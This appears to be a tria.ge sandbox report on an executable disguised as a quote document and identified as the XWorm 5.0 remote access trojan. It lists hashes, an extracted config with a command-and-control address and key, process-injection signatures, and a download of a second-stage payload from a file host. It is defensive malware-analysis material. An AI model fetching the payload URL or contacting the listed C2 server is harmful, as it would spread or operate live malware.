Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    148s
  • max time network
    297s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/01/2025, 09:47 UTC

General

  • Target

    21012025_0947_21012025_cotización.exe

  • Size

    68KB

  • MD5

    88d8158ca98088d881cd08846dca5f24

  • SHA1

    1c11b75aac23b72b29a47bff55106ef8ac04bf47

  • SHA256

    6d217281437ec6542d839a5f130e001c3df8aa9b20d47f48927600e10b4862d7

  • SHA512

    8cdbaafb8c90fe1e7d3018036ac53048fab1f84f7503cac91d610b4b383c58942d2e1ded25d68d60b73657fc270798017e512898a5d04d76c51a7ee7afd78843

  • SSDEEP

    768:+sX7zPeSAnG9cdeWOkglgS2x3M9hfVR431QWyVsFfY3CF2zInyQS+ST6nkC1:fvPeHn1ebeS59ql6sFQ3giInv/mq

Malware Config

Extracted

Family

xworm

Version

5.0

C2

194.59.31.174:5151

Mutex

4qOnj8VqoV2MS71I

Attributes
  • install_file

    USB.exe

aes.plain
1
d4/p3TepfrOKi0MBbXUuRA==

Signatures

  • Detect Xworm Payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3532
      • C:\Users\Admin\AppData\Local\Temp\21012025_0947_21012025_cotización.exe
        "C:\Users\Admin\AppData\Local\Temp\21012025_0947_21012025_cotización.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops startup file
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4880
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:644

    Network

    • flag-us
      DNS
      oshi.at
      21012025_0947_21012025_cotización.exe
      Remote address:
      8.8.8.8:53
      Request
      oshi.at
      IN A
      Response
      oshi.at
      IN A
      194.15.112.248
    • flag-cz
      GET
      https://oshi.at/fcXk
      21012025_0947_21012025_cotización.exe
      Remote address:
      194.15.112.248:443
      Request
      GET /fcXk HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
      Host: oshi.at
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Tue, 21 Jan 2025 09:47:44 GMT
      Content-Type: video/mp4
      Content-Length: 1027592
      Connection: keep-alive
      Accept-Ranges: bytes
      Last-Modified: Mon, 20 Jan 2025 16:11:04 GMT
      ETag: "7934cc6ee5eaf3acb5a0ce58fa9fad77"
      Content-Disposition: attachment; filename=EcKp.mp4
    • flag-us
      DNS
      149.220.183.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      149.220.183.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      75.159.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      75.159.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      248.112.15.194.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      248.112.15.194.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      167.173.78.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      167.173.78.104.in-addr.arpa
      IN PTR
      Response
      167.173.78.104.in-addr.arpa
      IN PTR
      a104-78-173-167deploystaticakamaitechnologiescom
    • flag-us
      DNS
      228.249.119.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      228.249.119.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      28.118.140.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      28.118.140.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      174.31.59.194.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      174.31.59.194.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      212.20.149.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      212.20.149.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      206.23.85.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      206.23.85.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      167.190.18.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      167.190.18.2.in-addr.arpa
      IN PTR
      Response
      167.190.18.2.in-addr.arpa
      IN PTR
      a2-18-190-167deploystaticakamaitechnologiescom
    • flag-us
      DNS
      60.153.16.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      60.153.16.2.in-addr.arpa
      IN PTR
      Response
      60.153.16.2.in-addr.arpa
      IN PTR
      a2-16-153-60deploystaticakamaitechnologiescom
    • flag-us
      DNS
      181.129.81.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      181.129.81.91.in-addr.arpa
      IN PTR
      Response
    • 194.15.112.248:443
      https://oshi.at/fcXk
      tls, http
      21012025_0947_21012025_cotización.exe
      18.8kB
      1.1MB
      396
      773

      HTTP Request

      GET https://oshi.at/fcXk

      HTTP Response

      200
    • 194.59.31.174:5151
      InstallUtil.exe
      4.0kB
      2.7kB
      54
      52
    • 8.8.8.8:53
      oshi.at
      dns
      21012025_0947_21012025_cotización.exe
      53 B
      69 B
      1
      1

      DNS Request

      oshi.at

      DNS Response

      194.15.112.248

    • 8.8.8.8:53
      149.220.183.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      149.220.183.52.in-addr.arpa

    • 8.8.8.8:53
      75.159.190.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      75.159.190.20.in-addr.arpa

    • 8.8.8.8:53
      248.112.15.194.in-addr.arpa
      dns
      73 B
      141 B
      1
      1

      DNS Request

      248.112.15.194.in-addr.arpa

    • 8.8.8.8:53
      167.173.78.104.in-addr.arpa
      dns
      73 B
      139 B
      1
      1

      DNS Request

      167.173.78.104.in-addr.arpa

    • 8.8.8.8:53
      228.249.119.40.in-addr.arpa
      dns
      73 B
      159 B
      1
      1

      DNS Request

      228.249.119.40.in-addr.arpa

    • 8.8.8.8:53
      28.118.140.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      28.118.140.52.in-addr.arpa

    • 8.8.8.8:53
      174.31.59.194.in-addr.arpa
      dns
      72 B
      132 B
      1
      1

      DNS Request

      174.31.59.194.in-addr.arpa

    • 8.8.8.8:53
      212.20.149.52.in-addr.arpa
      dns
      72 B
      146 B
      1
      1

      DNS Request

      212.20.149.52.in-addr.arpa

    • 8.8.8.8:53
      206.23.85.13.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      206.23.85.13.in-addr.arpa

    • 8.8.8.8:53
      167.190.18.2.in-addr.arpa
      dns
      71 B
      135 B
      1
      1

      DNS Request

      167.190.18.2.in-addr.arpa

    • 8.8.8.8:53
      60.153.16.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      60.153.16.2.in-addr.arpa

    • 8.8.8.8:53
      181.129.81.91.in-addr.arpa
      dns
      72 B
      147 B
      1
      1

      DNS Request

      181.129.81.91.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/644-1344-0x0000000000400000-0x0000000000410000-memory.dmp

      Filesize

      64KB

    • memory/644-1346-0x0000000074A70000-0x0000000075220000-memory.dmp

      Filesize

      7.7MB

    • memory/644-1345-0x0000000005350000-0x00000000053EC000-memory.dmp

      Filesize

      624KB

    • memory/644-1347-0x0000000074A70000-0x0000000075220000-memory.dmp

      Filesize

      7.7MB

    • memory/644-1348-0x0000000005970000-0x000000000597A000-memory.dmp

      Filesize

      40KB

    • memory/644-1350-0x0000000006440000-0x00000000064A6000-memory.dmp

      Filesize

      408KB

    • memory/644-1349-0x0000000074A70000-0x0000000075220000-memory.dmp

      Filesize

      7.7MB

    • memory/4880-41-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-33-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-4-0x00000000071A0000-0x0000000007744000-memory.dmp

      Filesize

      5.6MB

    • memory/4880-5-0x0000000006CB0000-0x0000000006D42000-memory.dmp

      Filesize

      584KB

    • memory/4880-13-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-47-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-45-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-59-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-69-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-67-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-65-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-63-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-61-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-57-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-55-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-53-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-49-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-51-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-43-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-2-0x0000000074A70000-0x0000000075220000-memory.dmp

      Filesize

      7.7MB

    • memory/4880-39-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-37-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-35-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-3-0x0000000006AF0000-0x0000000006BF2000-memory.dmp

      Filesize

      1.0MB

    • memory/4880-31-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-29-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-27-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-25-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-23-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-17-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-15-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-21-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-19-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-11-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-9-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-7-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-6-0x0000000006AF0000-0x0000000006BEB000-memory.dmp

      Filesize

      1004KB

    • memory/4880-1328-0x0000000074A70000-0x0000000075220000-memory.dmp

      Filesize

      7.7MB

    • memory/4880-1330-0x0000000006E10000-0x0000000006E68000-memory.dmp

      Filesize

      352KB

    • memory/4880-1331-0x0000000006EF0000-0x0000000006F3C000-memory.dmp

      Filesize

      304KB

    • memory/4880-1329-0x0000000006DB0000-0x0000000006E0C000-memory.dmp

      Filesize

      368KB

    • memory/4880-1332-0x00000000070C0000-0x0000000007114000-memory.dmp

      Filesize

      336KB

    • memory/4880-1342-0x0000000074A70000-0x0000000075220000-memory.dmp

      Filesize

      7.7MB

    • memory/4880-1343-0x0000000074A70000-0x0000000075220000-memory.dmp

      Filesize

      7.7MB

    • memory/4880-1-0x0000000000E70000-0x0000000000E84000-memory.dmp

      Filesize

      80KB

    • memory/4880-0-0x0000000074A7E000-0x0000000074A7F000-memory.dmp

      Filesize

      4KB

    • memory/4880-1340-0x0000000074A70000-0x0000000075220000-memory.dmp

      Filesize

      7.7MB

    • memory/4880-1338-0x0000000074A70000-0x0000000075220000-memory.dmp

      Filesize

      7.7MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.